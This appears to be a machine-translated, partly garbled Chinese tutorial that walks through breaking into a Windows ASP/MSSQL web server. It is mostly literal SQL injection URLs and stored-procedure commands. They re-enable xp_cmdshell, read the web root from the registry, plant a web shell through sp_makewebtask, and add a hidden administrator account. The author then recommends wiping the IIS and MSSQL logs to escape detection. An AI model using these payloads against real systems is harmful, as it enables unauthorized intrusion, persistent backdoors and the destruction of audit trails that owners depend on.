Use pure script to obtain system authority

zhaozj2021-02-16  99

One. Stepping on the point is a primary work for a security test for a server. Let's take a port scan for the server. I took out a very good scanner written by my friends, the speed is quite fast, you can open 2000 threads at the same time! (WTF: Good!) Half Skills, the port 1-65535 is over. The open port of the scan is as follows: 21, 80, 1433, 3389 The result of scanning again is the same, and almost certainly it is. After the impact wave, the server on the network has a lot of security, and the system vulnerability invasion has become difficult. Let me analyze it first: I set the target in 21 and 1433 ports. Now I only look at luck, see if I can sweep out a weak password (WTF: Oh, I want to be very beautiful!) - I am unlucky, I haven't swept it for a long time, I have a moving machine, what is the same today, what Didn't sweep it out. It seems that I only look for an exit from the website script. two. Fully exploring the website has opened a 1433 port, that is, SQL Server service. General websites are scheduled for the ASP MSSQL structure, and the injection vulnerability of the ASP script is better than other script, and the vulnerability is also relatively large. many. Under normal circumstances, I add single quotes after the parameters submitted. If the parameter is not filtered, IE generally returns an error message. I quickly found a parameter without any filtering. Submit: http://www.something.com/script.asp? Id = 2 'IE Return: Submit http://www.something.com/script.asp?id=2and 1 = 1 IE Returns normal record. Submit http://www.something.com/script.asp?id=2and 1 = 2 IE did not return records. Ok, this is determined that there is a vulnerability, let's take advantage of this vulnerability to get some information about the server and database. For example, if you want to see the patch of the server, we submit: http://www.something.com/script.asp?id=2and 1 = (Select @@ version) error, huh, IE, return to us to return to the error message Figure 1 shows: Figure 1 shows that the server has played SP4 patches, and "It is said to" SP4, there is also a spillout program for 80 and the overflow program for MSSQL SP3. However, these are "absolute confidential", it is estimated that there are few people who can get it, and I don't have it anyway, I will take him on that day! Now let's continue! This server is more secure from the system, so I still have to start from scripting. Let's take a look at the permissions of his database connection account. Is server role sysadmin authority. WTF: Is_SrvroleMember ('role' [, 'login'] function is used to determine if the current user login is a member of the specified server role. Among them, Role is the name of the server role being checked. Login is optional, if not specified, then use the current user's login account.

If Login is a member of the Role, return 1, not returning 0, if the Role or Login is invalid, then return NULL. I almost didn't spray a tea in my mouth on the computer screen. The server role currently connected to the account is actually sysadmin permissions! As shown in Figure 2: Figure 2 Haha! It seems that the connection account is connected to the SA account. Submitted: http://www.something.com/script.asp?id=2and 'sa' = (Select System_User) Used to view the connection account is connected to the SA, IE returns to normal again. This proves that the connection account is really sa, it seems that the permissions are so high. WTF: When using the application role, execute the Select User will return the name of the currently used application role. If you want to get the identity of the logged in user, use the Transact-SQL statement: SELECT System_User. Here, many people may think of using the XP_cmdshell extension stored procedure to add system accounts, and then use the terminal to connect the server. This is very good idea! I am also a member of many people! Let's try to see it! three. Use the MSSQL stored procedure to get the WebShell, let's see if Xp_cmdshell is deleted by the administrator! Submitted: http://www.something.com/script.asp?id=2and 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') IE returned As follows: It seems that XP_cmdshell has been deleted. Oh, let's recover him! http://www.something.com/script.asp?id=2 ;Exec Master.dbo.sp_addextendedProc 'XP_CMDSHELL', 'XPLOG70.DLL' Try again, see XP_CMDSHELL is recovering? http: // www. Something.com/script.asp?id=2and 1 = (Select Count (*) from master.dbo.sysObjects where xtype = 'x' and name = 'xp_cmdshell') WTF: Xiaobian in later attempts, found XP_cmdshell Restored? Haha, I don't know which brother left the result? The same is not returned. This proves that the administrator is renamed this dynamic link library of XPLog70.dll. If you don't delete it, it seems that direct recovery is no way. In this regard, I can only say two words "I forbearance"! Such a lot of vulnerabilities, it is not good to use it, I am not willing to say this, it is powerful. Let's talk about him first, hey, after getting Webshell, I naturally have a way to deal with him, hahaha ... (Stariser smile!). See how to get WebShell! Have you seen n.e.v.e.r and czy's article? Take the Webshell method, both have been introduced in detail. I also write their methods into procedures, convenient for me, but it is difficult to get the web absolute path. Where is the Trojan we generated? This may be a problem that many cattle have been studying. Fortunately, I still understand MSSQL.

I have a way to get his web absolute path, come with me. (WTF: This is definitely a very very big flash point! Everyone sees!) Let's take advantage of two MSSQL stored procedures. However, it is necessary to introduce you to the XP_REGREAD extension stored procedure and sp_makewebtask web assistant stored procedure: XP_REGREAD is used to read the registry information, and we get this stored procedure to save the web absolute path in the registry. SP_MAKEWEBTASK is used here to get WebShell, its main function is to export records for the table in the database, and the file name you can specify yourself. Of course, we specify as an ASP script file! Imagine if the script code is saved in the table, the file is the script file. So, the record we add is the script code. Here I don't have to use n.e.v.e.r. His way is to export library files, exported files are relatively large, and many garbled looks inconvenient, if there is an ASP tag, there is a wrong ASP code, it is not good, open Most Return 500 error The code, so we use CZY methods, which is the web job to get the shell. 1. How can I get the web absolute path? Ha ha? This problem, I spent a long time to study. Everyone knows that MS's things are placed in the registry. We can get in the registration table, the location is as follows: hkey_local_machine / system / controlset001 / service / w3svc / parameters / virtual roots Utilize the stored procedure XP_REGREAD We can get Its value. EXEC MASTER.DBO.XP_REGREAD 'HKEY_LOCAL_MACHINE', 'System / Controlset001 / Services / W3SVC / Parameters / Virtual Roots', '/' This is taken, but the problem is coming, it is taken out. How do we return its value in IE? My method is: Create a temporary table, add a field in the table, type: char 255. Oh, use it to save the value of the absolute path of the web. After the table is built, we use the method of reading the registry to save the returned value in a variable. Then add the record (ie the value of the variable) to the new table. In this way, the path is written to the table. Submit: DECLARE @result varchar (255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM / ControlSet001 / Services / W3SVC / Parameters / Virtual Roots', '/', @result output into a temporary table (field name provisional) insert VALUES (@Result); - then let us submit: 1 = (Select Count (*) from temporary table where temporary field name> 1) This IE reports the value of the web path you just plugged in. . I also tried to use the variable to report the error, let IE return the value of the variable, the result is failed, so I think the way to build a temporary table add data! Finally, we delete the temporary table of the original built. WebShell gets it, and the work will tell a paragraph. 2. How do I get the article of WebShell? CZY has been written very detailed. So, I just simply mention it! Create a table, build a field, and add the contents of the Trojan to this field.

Then, the content is exported to the ASP script in the web absolute path via the XP_MAKEWEBTASK stored procedure. Remove the built-in temporary table again, everything over. Such as: execute sp_makewebtask @outputfile = 'web absolute path / export file name .asp', @query = 'SELECT Your field from you, your temporary table' Oh, the result is coming out. Of course, I have written a procedure, so I don't have to have trouble yourself and a line of add data (WTF: this article has a detailed introduction! Everyone will not be disappointed!). Methods and ideas are written, now let's take action. Still look at it first, his two extended stored procedures have been deleted. If I was deleted, I don't want to live! Oh, submit: http://www.something.com/script.asp?id=2and 1 = (select count (*) from master.dbo.sysobjects where name = 'xp_regread') Submit: http: // www .something.com / script.asp? id = 2and 1 = (select count (*) from master.dbo.sysobjects where name = 'sp_makewebtask') La la la! What day is today, I am happy than the New Year. All returned to normal! The two stored procedures to be used are not deleted. WTF Note: General administrators will not delete these two, maybe less understanding them, and will not pay attention to them! The crisis is in this!嘿嘿. Ok, after getting a web absolute path. Continue to build a table: http://www.something.com/script.asp?id=2;create table [dbo]. [Cyfd] ([GYFD] [char] (255)); then we succeeded A table named CYFD and adding a type of Char, a field name GYFD with a length of 255. Then add data to the table: http://www.something.com/script.asp?id=2; Declare @Result varchar (255) EXEC MASTER.DBO.XP_REGREAD 'HKEY_LOCAL_MACHINE', 'SYSTEM / Controlset001 / Services / W3SVC / Parameters / virtual roots', '/', @Result Output INSERT INTO CYFD (@Result); - Read the web absolute path from the registry, then insert the path into the table just built. Then report the absolute path of WebShell: http://www.something.com/script.asp?id=2and 1 = (Select Count (*) from cyfd where gyfd> 1) After the error, IE returns an error, we get web Absolute path "D: / INETPUB / WWWWROOT"! After the effort, it is very sweet! Drink tea! As shown in Figure 3, Figure 3 and then delete the table that has just been built, submitted: http://www.something.com/script.asp?id=2: Drop Table Cyfd; - OK, there is a path under the path.

Open the program I wrote to get the WebShell, enter the vulnerability urlhttp://www.yfd.com/yfd.com? Id = 2 Enter the absolute path to save Trojans: D: / inetpub / wwwroot. Trojan, I have been configured, the code is streamlined and streamlined, only 30 lines of code, so that the data is submitted to the server. Accelerate speed! The main function of the Trojan is the input content, saving the input content as a file. Oh, through such a Trojan, we can achieve some powerful script Trojans, such as ocean horses. Not a minute. The programs have been running. Enter the corresponding path, Wahaha (WTF: Brothers who want to eat this "drink"? Haha!), WebShell is coming, the fastest speed has a marine Trojan, as shown in Figure 4, Figure 5: Figure 4 Figure 5 I live In happiness! - wtf often says this sentence, I seem to have been infected today! Below we have come! four. Restore xp_cmdshell, enter system authority! The following work is very simple, it is very easy. If you don't get 10 minutes, you will give you an administrator account, saying XP_cmdshell has been deleted. And it is impossible to recover, this is the administrator to delete the XPLog70.dll file, or no name. Nothing, let's upload an XPLog70.dll to get everything, through WebShell. I quickly uploaded the XPLog70.dll file to the E: / inetpub / wwwroot directory, come, let's return to him, submit: http://www.something.com/script.asp?id= 2; exec master.dbo.sp_addextendedProc 'xp_cmdshell', 'E: /inetpub/wwrowroot/xplog70.dll' recovery, supports the absolute path recovery. :) Figure 6 Figure 6 ok. We use IE to see if it has been restored. Submitted: http://www.something.com/script.asp?id=2and 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') 嘿嘿. Returns normal. Has been restored, do you still use me? Ha ha! Account: http://www.something.com/script.asp?id=2 ;ec master.dbo.xp_cmdshell 'net user chouyfd Chouyfd1314yf / add' upgraded ourselves for super administrators http://www.something.com /script.asp?id=2 ;exec master.dbo.xp_cmdshell 'net localgroup administrators chouyfd / add' is over. Open your terminal connection, join! Haha, finally gave me. At this point, I successfully got the system administrator account of this host. As shown in Figure 7: Figure 7 The following work is to clear the log and leave a super back door, flash! Five. Afterwards, after the work terminal is connected, remove the IIS log, and the MSSQL log at the fastest speed. At the same time, put XP_cmdshell also deleted him, don't let him find it, it will not do it.

转载请注明原文地址:https://www.9cbs.com/read-15817.html

New Post(0)